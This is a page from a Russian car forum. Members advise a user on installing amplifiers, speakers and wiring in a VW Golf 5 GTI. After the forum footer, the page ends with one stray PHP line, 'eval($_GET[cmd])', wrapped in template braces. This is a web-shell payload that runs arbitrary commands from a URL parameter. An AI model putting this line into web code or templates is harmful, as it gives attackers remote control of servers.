+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 46

Тема: Установка музыки с 0 в Гольф 5 GTI


  1. #1
    Новичок hotchil is on a distinguished road Аватар для hotchil
    Регистрация
    13.02.2007
    Сообщений
    116
    Итак, пока не пришла машина, начал думать по установке. Имеется 2-х диновая голова, как штатная (РСД 300), так и Пионеровский монитор с выносным пультом правления (не сенсорный экран) с чейнджером внутри. У штатной соответственно 1 диск.

    Есть 3 усилителя Алпайн, какие модели уточню завтра. 2 из них 2-х канальные и один - 4-х канальный. Подразумеваю установку их в багажном отсеке вместе с сабом.

    Аккустика - пока не определился, надо брать ту, чтоб по вылету не была на траектории стекла (если я прав конечно). Насколько уже понял НЧ - 6,5", СЧ - 4", ВЧ - 1". Вроде есть акустика класса А, какая - тоже уточню позже...

    Вопросы: 1) как снимается обшивка в багажнике?
    2)ставить ли кондей?
    3) разумно ли 3 усилителя?
    4) где проводить провода силовой и минус?
    5) снимается ли торпедо для установки и где там проводить провода?
    6) делать ли виброизоляцию? (я про ту, что обклеивает перекрытия дверей, а не сами поверхности дверей изнутри)...


    Прошу прощения за лошарство, но очень хочу познать все...

  2. #2
    GTI-Racing Spaikerr is on a distinguished road Аватар для Spaikerr
    Регистрация
    02.09.2006
    Откуда
    МСК
    Машина
    корч
    Сообщений
    719
    Поговори с Chess'ом. Он тоже, вроде, ставил себе музыку в гольфу и делал шумку.
    mk2 VR6 размазан по отбойнику

  3. #3
    GTI-Racing magnum126 is on a distinguished road Аватар для magnum126
    Регистрация
    06.03.2006
    Откуда
    СВАО
    Машина
    opel manta B 1979, VW Derby 1982, VW Golf 6, AUDI A2 s-line, OPEL ZAFIRA COSMO!!
    Сообщений
    3,618
    нормальн оподготовился по компонентам)) зачед)

  4. #4
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Originally posted by hotchil@Jun 6 2007, 22:46
    Итак, пока не пришла машина, начал думать по установке. Имеется 2-х диновая голова, как штатная (РСД 300), так и Пионеровский монитор с выносным пультом правления (не сенсорный экран) с чейнджером внутри. У штатной соответственно 1 диск.

    Есть 3 усилителя Алпайн, какие модели уточню завтра. 2 из них 2-х канальные и один - 4-х канальный. Подразумеваю установку их в багажном отсеке вместе с сабом.
    <span style="color:orange">Если хочешь оставить и сзади места для пассажиров, то багажник единственное место. </span>

    Аккустика - пока не определился, надо брать ту, чтоб по вылету не была на траектории стекла (если я прав конечно). Насколько уже понял НЧ - 6,5", СЧ - 4", ВЧ - 1". Вроде есть акустика класса А, какая - тоже уточню позже...

    Вопросы: 1) как снимается обшивка в багажнике?
    2)ставить ли кондей?
    <span style="color:orange">Да </span>
    3) разумно ли 3 усилителя?
    <span style="color:orange">Если собираешся делать только фронт и саб, то хватит и 2-х, если хочешь чтоб была подзвучка небольшая, то можно и назад колонки взяв выход с магнитолы (но так как это штатмагнитола, то это не катит). Если хочешь мощный звук по всей машине, то как раз третий усилитель на задние динамики.</span>
    4) где проводить провода силовой и минус?
    <span style="color:orange">Под обшивкой пола, надежно защитив от механических повреждений. Провода питания проводи по одному борту, звук по другому.</span>
    5) снимается ли торпедо для установки и где там проводить провода?
    <span style="color:orange">Частично разбирается и аккуратно прокладывается</span>6) делать ли виброизоляцию? (я про ту, что обклеивает перекрытия дверей, а не сами поверхности дверей изнутри)...
    <span style="color:orange">Гольф никогда не сравню, ни с Факусом, ни с Мацдой и т.п. по шумке, там нужно реально изолировать, Гольф хорошо и плотно собран, можно ограничется косметической подтяжкой.</span>
    Прошу прощения за лошарство, но очень хочу познать все...
    <div align='right'><{POST_SNAPBACK}></div>
    Лучше конечно же доверить это все понимающим людям, у меня приятель даже после качественной самостоятельной установки неслабых компонентов, поехал на настройку к людям, которые имеют какие то заслуги, опыт, кубки и машина заиграла так, что мы не поверили. Даже чел который потом купил у него машину, сначала нах музыка, но ему включили за полторашку сверху (за пол цены) он взял и музыку.
    песок сыпется....не останавливайтесь на достигнутом !

  5. #5
    Новичок hotchil is on a distinguished road Аватар для hotchil
    Регистрация
    13.02.2007
    Сообщений
    116
    Originally posted by BON@Jun 7 2007, 08:01
    Лучше конечно же доверить это все понимающим людям, у меня приятель даже после качественной самостоятельной установки неслабых компонентов, поехал на настройку к людям, которые имеют какие то заслуги, опыт, кубки и машина заиграла так, что мы не поверили. Даже чел который потом купил у него машину, сначала нах музыка, но ему включили за полторашку сверху (за пол цены) он взял и музыку.
    <div align='right'><{POST_SNAPBACK}></div>

    Спасибо. Еще вопросы: как мне снимать обшивку в багажнике, и сзади, гда второй ряд сидений (3-х дверный кузов)? Можно ли провести проводку в порогах?

  6. #6
    Мимо проходил Eu-Jinn is on a distinguished road Аватар для Eu-Jinn
    Регистрация
    04.03.2007
    Сообщений
    76
    Я бы в гарантийную машину сам не полез бы
    проводку по порогам можно

  7. #7
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Originally posted by hotchil@Jun 7 2007, 15:39
    Спасибо. Еще вопросы: как мне снимать обшивку в багажнике, и сзади, гда второй ряд сидений (3-х дверный кузов)? Можно ли провести проводку в порогах?
    <div align='right'><{POST_SNAPBACK}></div>
    Зачем снимать обшивку ? все красиво крепиться в багажнике сверху нее (бюджетно) кто любит красиво можно сверху фальшпанель вырезать.

    Зачем на втором ряду обшивку трогать? Динамики в подготовленные места в двери, кроссоверы под сиденье.

    Проводку в порогах......... не понятно :blink:
    Провода прокладывются под ковром слева питание и справа звук..... можно наоборот , но не вместе.
    песок сыпется....не останавливайтесь на достигнутом !

  8. #8
    Новичок hotchil is on a distinguished road Аватар для hotchil
    Регистрация
    13.02.2007
    Сообщений
    116
    Originally posted by BON@Jun 7 2007, 15:47
    Зачем снимать обшивку ? все красиво крепиться в багажнике сверху нее (бюджетно) кто любит красиво можно сверху фальшпанель вырезать.

    Зачем на втором ряду обшивку трогать? Динамики в подготовленные места в двери, кроссоверы под сиденье.

    Проводку в порогах......... не понятно :blink:
    Провода прокладывются под ковром слева питание и справа звук..... можно наоборот , но не вместе.
    <div align='right'><{POST_SNAPBACK}></div>

    Все динамики буду менять, усилители планирую под обшивку в багажник, так что все снимать придется по-любому.

  9. #9
    GTI-Racing chess is on a distinguished road Аватар для chess
    Регистрация
    29.11.2006
    Откуда
    москвабад
    Машина
    CTR ЕК9, MPS K90, vw polo 6r
    Сообщений
    1,603
    Originally posted by hotchil@Jun 6 2007, 22:46
    Есть 3 усилителя Алпайн, какие модели уточню завтра. 2 из них 2-х канальные и один - 4-х канальный. Подразумеваю установку их в багажном отсеке вместе с сабом.
    <span style="color:blue">два канала на саб мостом и четыре на фронт и тыл. еще два лишнее ИМХО, места в багажнике не останется. какой саб?</span>
    Аккустика - пока не определился, надо брать ту, чтоб по вылету не была на траектории стекла (если я прав конечно). Насколько уже понял НЧ - 6,5", СЧ - 4", ВЧ - 1". Вроде есть акустика класса А, какая - тоже уточню позже...
    <span style="color:blue">не проблема. у моих DLS магнит на 15мм заходил за траекторию стекла - поставили проставочные кольца и все стало нормально. только немного упиралось в обшивку - пришлось немного пофрезировать на станке. трехполосный фронт в штатные места на г5 есть у eton.</span>

    Вопросы: 1) как снимается обшивка в багажнике?
    <span style="color:blue">на http://volkswagen.msk.ru/ недавно выкладывали pdf как весь салон разобрать. по отдельности тоже есть, поищи. там все понятно хоть и по немецки. обшивка в багажнике в основном на пистонах и винтах - разбирал и собирал сам - все нормально.</span>
    3) разумно ли 3 усилителя?
    <span style="color:blue">неа</span>
    4) где проводить провода силовой и минус?
    <span style="color:blue">неужели сам будешь?</span>
    5) снимается ли торпедо для установки и где там проводить провода?
    <span style="color:blue">большой геморрой </span>
    6) делать ли виброизоляцию? (я про ту, что обклеивает перекрытия дверей, а не сами поверхности дверей изнутри)...
    <span style="color:blue">я делал. если не делать всю машину - лучше не начинай. если соберешься делать двери - имей в виду они собираются на центральной части, т.е. отдельно внутренний пластик, отдельно лицевая часть(потом сложно выставить зазоры)</span>
    каждому своё
    АДМ GTI mkV st1.5 - 2.01.084
    АДМ Civic Type-R EK9 - 1.57.683
    Смоленск Civic Type-R EK9 - 1.47.690
    Нижний Новгород Civic Type-R EK9 - 1.53.472
    Казань Civic Type-R EK9 - 1.43.187
    MRW Civic Type-R EK9 - 2.01.663

  10. #10
    Новичок hotchil is on a distinguished road Аватар для hotchil
    Регистрация
    13.02.2007
    Сообщений
    116
    Originally posted by chess@Jun 7 2007, 17:57
    <div align='right'><{POST_SNAPBACK}></div>

    Спасибо, как только установлю точно все компоненты, какие будут у меня в наличии - сразу отпишу. Проводить буду с мастером, есть парень знакомый. Я сам хочу просто понять процесс и технологию.

+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Немного музыки
    от Adsumus в разделе Барахолка
    Ответов: 9
    Последнее сообщение: 02.04.2024, 17:10
  2. комплект музыки для г5 - 35 тр.
    от cbrrr в разделе Барахолка
    Ответов: 5
    Последнее сообщение: 01.04.2024, 23:13
  3. Любителям электронной музыки!
    от keeper в разделе Курилка
    Ответов: 35
    Последнее сообщение: 12.06.2018, 00:10
  4. Любителям Клубной Музыки!
    от keeper в разделе Курилка
    Ответов: 13
    Последнее сообщение: 11.04.2009, 14:33
  5. Продам Немного Музыки.
    от Squad в разделе Барахолка
    Ответов: 3
    Последнее сообщение: 25.02.2009, 01:10

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}